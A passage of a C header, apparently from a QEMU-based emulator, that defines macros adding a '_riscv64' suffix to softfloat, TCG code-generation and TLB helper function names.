float128_sub float128_sub_riscv64 #define float128_mul float128_mul_riscv64 #define float128_div float128_div_riscv64 #define float128_rem float128_rem_riscv64 #define float128_sqrt float128_sqrt_riscv64 #define float128_eq float128_eq_riscv64 #define float128_le float128_le_riscv64 #define float128_lt float128_lt_riscv64 #define float128_unordered float128_unordered_riscv64 #define float128_eq_quiet float128_eq_quiet_riscv64 #define float128_le_quiet float128_le_quiet_riscv64 #define float128_lt_quiet float128_lt_quiet_riscv64 #define float128_unordered_quiet float128_unordered_quiet_riscv64 #define floatx80_compare floatx80_compare_riscv64 #define floatx80_compare_quiet floatx80_compare_quiet_riscv64 #define float128_compare float128_compare_riscv64 #define float128_compare_quiet float128_compare_quiet_riscv64 #define floatx80_scalbn floatx80_scalbn_riscv64 #define float128_scalbn float128_scalbn_riscv64 #define softfloat_init softfloat_init_riscv64 #define tcg_optimize tcg_optimize_riscv64 #define gen_new_label gen_new_label_riscv64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_riscv64 #define tcg_expand_vec_op tcg_expand_vec_op_riscv64 #define tcg_register_jit tcg_register_jit_riscv64 #define tcg_tb_insert tcg_tb_insert_riscv64 #define tcg_tb_remove tcg_tb_remove_riscv64 #define tcg_tb_lookup tcg_tb_lookup_riscv64 #define tcg_tb_foreach tcg_tb_foreach_riscv64 #define tcg_nb_tbs tcg_nb_tbs_riscv64 #define tcg_region_reset_all tcg_region_reset_all_riscv64 #define tcg_region_init tcg_region_init_riscv64 #define tcg_code_size tcg_code_size_riscv64 #define tcg_code_capacity tcg_code_capacity_riscv64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_riscv64 #define tcg_malloc_internal tcg_malloc_internal_riscv64 #define tcg_pool_reset tcg_pool_reset_riscv64 #define tcg_context_init tcg_context_init_riscv64 #define tcg_tb_alloc tcg_tb_alloc_riscv64 #define tcg_prologue_init tcg_prologue_init_riscv64 #define tcg_func_start tcg_func_start_riscv64 #define tcg_set_frame tcg_set_frame_riscv64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_riscv64 #define tcg_temp_new_internal tcg_temp_new_internal_riscv64 #define tcg_temp_new_vec tcg_temp_new_vec_riscv64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_riscv64 #define tcg_temp_free_internal tcg_temp_free_internal_riscv64 #define tcg_const_i32 tcg_const_i32_riscv64 #define tcg_const_i64 tcg_const_i64_riscv64 #define tcg_const_local_i32 tcg_const_local_i32_riscv64 #define tcg_const_local_i64 tcg_const_local_i64_riscv64 #define tcg_op_supported tcg_op_supported_riscv64 #define tcg_gen_callN tcg_gen_callN_riscv64 #define tcg_op_remove tcg_op_remove_riscv64 #define tcg_emit_op tcg_emit_op_riscv64 #define tcg_op_insert_before tcg_op_insert_before_riscv64 #define tcg_op_insert_after tcg_op_insert_after_riscv64 #define tcg_cpu_exec_time tcg_cpu_exec_time_riscv64 #define tcg_gen_code tcg_gen_code_riscv64 #define tcg_gen_op1 tcg_gen_op1_riscv64 #define tcg_gen_op2 tcg_gen_op2_riscv64 #define tcg_gen_op3 tcg_gen_op3_riscv64 #define tcg_gen_op4 tcg_gen_op4_riscv64 #define tcg_gen_op5 tcg_gen_op5_riscv64 #define tcg_gen_op6 tcg_gen_op6_riscv64 #define tcg_gen_mb tcg_gen_mb_riscv64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_riscv64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_riscv64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_riscv64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_riscv64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_riscv64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_riscv64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_riscv64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_riscv64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_riscv64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_riscv64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_riscv64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_riscv64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_riscv64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_riscv64 #define tcg_gen_div_i32 tcg_gen_div_i32_riscv64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_riscv64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_riscv64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_riscv64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_riscv64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_riscv64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_riscv64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_riscv64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_riscv64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_riscv64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_riscv64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_riscv64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_riscv64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_riscv64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_riscv64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_riscv64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_riscv64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_riscv64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_riscv64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_riscv64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_riscv64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_riscv64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_riscv64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_riscv64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_riscv64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_riscv64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_riscv64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_riscv64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_riscv64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_riscv64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_riscv64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_riscv64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_riscv64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_riscv64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_riscv64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_riscv64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_riscv64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_riscv64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_riscv64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_riscv64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_riscv64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_riscv64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_riscv64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_riscv64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_riscv64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_riscv64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_riscv64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_riscv64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_riscv64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_riscv64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_riscv64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_riscv64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_riscv64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_riscv64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_riscv64 #define tcg_gen_div_i64 tcg_gen_div_i64_riscv64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_riscv64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_riscv64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_riscv64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_riscv64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_riscv64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_riscv64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_riscv64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_riscv64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_riscv64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_riscv64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_riscv64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_riscv64 #define tcg_gen_not_i64 tcg_gen_not_i64_riscv64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_riscv64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_riscv64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_riscv64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_riscv64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_riscv64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_riscv64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_riscv64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_riscv64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_riscv64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_riscv64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_riscv64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_riscv64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_riscv64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_riscv64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_riscv64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_riscv64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_riscv64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_riscv64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_riscv64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_riscv64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_riscv64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_riscv64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_riscv64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_riscv64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_riscv64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_riscv64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_riscv64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_riscv64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_riscv64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_riscv64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_riscv64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_riscv64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_riscv64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_riscv64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_riscv64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_riscv64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_riscv64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_riscv64 #define tcg_gen_exit_tb tcg_gen_exit_tb_riscv64 #define tcg_gen_goto_tb tcg_gen_goto_tb_riscv64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_riscv64 #define check_exit_request check_exit_request_riscv64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_riscv64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_riscv64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_riscv64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_riscv64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_riscv64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_riscv64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_riscv64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_riscv64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_riscv64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_riscv64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_riscv64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_riscv64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_riscv64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_riscv64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_riscv64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_riscv64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_riscv64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_riscv64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_riscv64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_riscv64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_riscv64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_riscv64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_riscv64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_riscv64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_riscv64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_riscv64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_riscv64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_riscv64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_riscv64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_riscv64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_riscv64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_riscv64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_riscv64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_riscv64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_riscv64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_riscv64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_riscv64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_riscv64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_riscv64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_riscv64 #define simd_desc simd_desc_riscv64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_riscv64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_riscv64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_riscv64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_riscv64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_riscv64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_riscv64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_riscv64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_riscv64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_riscv64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_riscv64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_riscv64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_riscv64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_riscv64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_riscv64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_riscv64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_riscv64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_riscv64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_riscv64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_riscv64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_riscv64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_riscv64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_riscv64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_riscv64 #define tcg_gen_gvec_not tcg_gen_gvec_not_riscv64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_riscv64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_riscv64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_riscv64 #define tcg_gen_gvec_add tcg_gen_gvec_add_riscv64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_riscv64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_riscv64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_riscv64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_riscv64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_riscv64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_riscv64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_riscv64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_riscv64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_riscv64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_riscv64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_riscv64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_riscv64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_riscv64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_riscv64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_riscv64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_riscv64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_riscv64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_riscv64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_riscv64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_riscv64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_riscv64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_riscv64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_riscv64 #define tcg_gen_gvec_and tcg_gen_gvec_and_riscv64 #define tcg_gen_gvec_or tcg_gen_gvec_or_riscv64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_riscv64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_riscv64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_riscv64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_riscv64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_riscv64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_riscv64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_riscv64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_riscv64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_riscv64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_riscv64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_riscv64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_riscv64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_riscv64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_riscv64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_riscv64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_riscv64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_riscv64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_riscv64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_riscv64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_riscv64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_riscv64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_riscv64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_riscv64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_riscv64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_riscv64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_riscv64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_riscv64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_riscv64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_riscv64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_riscv64 #define vec_gen_2 vec_gen_2_riscv64 #define vec_gen_3 vec_gen_3_riscv64 #define vec_gen_4 vec_gen_4_riscv64 #define tcg_gen_mov_vec tcg_gen_mov_vec_riscv64 #define tcg_const_zeros_vec tcg_const_zeros_vec_riscv64 #define tcg_const_ones_vec tcg_const_ones_vec_riscv64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_riscv64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_riscv64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_riscv64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_riscv64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_riscv64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_riscv64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_riscv64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_riscv64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_riscv64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_riscv64 #define tcg_gen_ld_vec tcg_gen_ld_vec_riscv64 #define tcg_gen_st_vec tcg_gen_st_vec_riscv64 #define tcg_gen_stl_vec tcg_gen_stl_vec_riscv64 #define tcg_gen_and_vec tcg_gen_and_vec_riscv64 #define tcg_gen_or_vec tcg_gen_or_vec_riscv64 #define tcg_gen_xor_vec tcg_gen_xor_vec_riscv64 #define tcg_gen_andc_vec tcg_gen_andc_vec_riscv64 #define tcg_gen_orc_vec tcg_gen_orc_vec_riscv64 #define tcg_gen_nand_vec tcg_gen_nand_vec_riscv64 #define tcg_gen_nor_vec tcg_gen_nor_vec_riscv64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_riscv64 #define tcg_gen_not_vec tcg_gen_not_vec_riscv64 #define tcg_gen_neg_vec tcg_gen_neg_vec_riscv64 #define tcg_gen_abs_vec tcg_gen_abs_vec_riscv64 #define tcg_gen_shli_vec tcg_gen_shli_vec_riscv64 #define tcg_gen_shri_vec tcg_gen_shri_vec_riscv64 #define tcg_gen_sari_vec tcg_gen_sari_vec_riscv64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_riscv64 #define tcg_gen_add_vec tcg_gen_add_vec_riscv64 #define tcg_gen_sub_vec tcg_gen_sub_vec_riscv64 #define tcg_gen_mul_vec tcg_gen_mul_vec_riscv64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_riscv64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_riscv64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_riscv64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_riscv64 #define tcg_gen_smin_vec tcg_gen_smin_vec_riscv64 #define tcg_gen_umin_vec tcg_gen_umin_vec_riscv64 #define tcg_gen_smax_vec tcg_gen_smax_vec_riscv64 #define tcg_gen_umax_vec tcg_gen_umax_vec_riscv64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_riscv64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_riscv64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_riscv64 #define tcg_gen_shls_vec tcg_gen_shls_vec_riscv64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_riscv64 #define tcg_gen_sars_vec tcg_gen_sars_vec_riscv64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_riscv64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_riscv64 #define tb_htable_lookup tb_htable_lookup_riscv64 #define tb_set_jmp_target tb_set_jmp_target_riscv64 #define cpu_exec cpu_exec_riscv64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_riscv64 #define cpu_reloading_memory_map cpu_reloading_memory_map_riscv64 #define cpu_loop_exit cpu_loop_exit_riscv64 #define cpu_loop_exit_restore cpu_loop_exit_restore_riscv64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_riscv64 #define tlb_init tlb_init_riscv64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_riscv64 #define tlb_flush tlb_flush_riscv64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_riscv64 #define tlb_flush_all_cpus tlb_flush_all_cpus_riscv64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_riscv64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_riscv64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_riscv64 #define tlb_flush_page tlb_flush_page_riscv64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_riscv64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_riscv64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_riscv64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_riscv64 #define tlb_protect_code tlb_protect_code_riscv64 #define tlb_unprotect_code tlb_unprotect_code_riscv64 #define tlb_reset_dirty tlb_reset_dirty_riscv64 #define tlb_set_dirty tlb_set_dirty_riscv64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_riscv64 #define tlb_set_page tlb_set_page_riscv64 #define get_page_addr_code_hostp get_page_addr_code_hostp_riscv64 #define get_page_addr_code get_page_addr_code_riscv64 #define probe_access probe_access_riscv64 #define tlb_vaddr_to_host tlb_vaddr_to_host_riscv64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_riscv64 #define helper_le_lduw_mmu helper_le_lduw_mmu_riscv64 #define helper_be_lduw_mmu helper_be_lduw_mmu_riscv64 #define helper_le_ldul_mmu helper_le_ldul_mmu_riscv64 #define helper_be_ldul_mmu helper_be_ldul_mmu_riscv64 #define helper_le_ldq_mmu helper_le_ldq_mmu_riscv64 #define helper_be_ldq_mmu helper_be_ldq_mmu_riscv64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_riscv64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_riscv64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_riscv64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_riscv64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_riscv64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_riscv64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_riscv64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_riscv64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_riscv64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_riscv64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_riscv64 #define cpu_ldub_data_ra cpu_ldub_data_ra_riscv64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_riscv64 #define cpu_lduw_data_ra cpu_lduw_data_ra_riscv64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_riscv64 #define cpu_ldl_data_ra cpu_ldl_data_ra_riscv64 #define cpu_ldq_data_ra cpu_ldq_data_ra_riscv64 #define cpu_ldub_data cpu_ldub_data_riscv64 #define cpu_ldsb_data cpu_ldsb_data_riscv64 #define cpu_lduw_data cpu_lduw_data_riscv64 #define cpu_ldsw_data cpu_ldsw_data_riscv64 #define cpu_ldl_data cpu_ldl_data_riscv64 #define cpu_ldq_data cpu_ldq_data_riscv64 #define helper_ret_stb_mmu helper_ret_stb_mmu_riscv64 #define helper_le_stw_mmu helper_le_stw_mmu_riscv64 #define helper_be_stw_mmu helper_be_stw_mmu_riscv64 #define helper_le_stl_mmu helper_le_stl_mmu_riscv64 #define helper_be_stl_mmu helper_be_stl_mmu_riscv64 #define helper_le_stq_mmu helper_le_stq_mmu_riscv64 #define helper_be_stq_mmu helper_be_stq_mmu_riscv64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_riscv64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_riscv64 #define 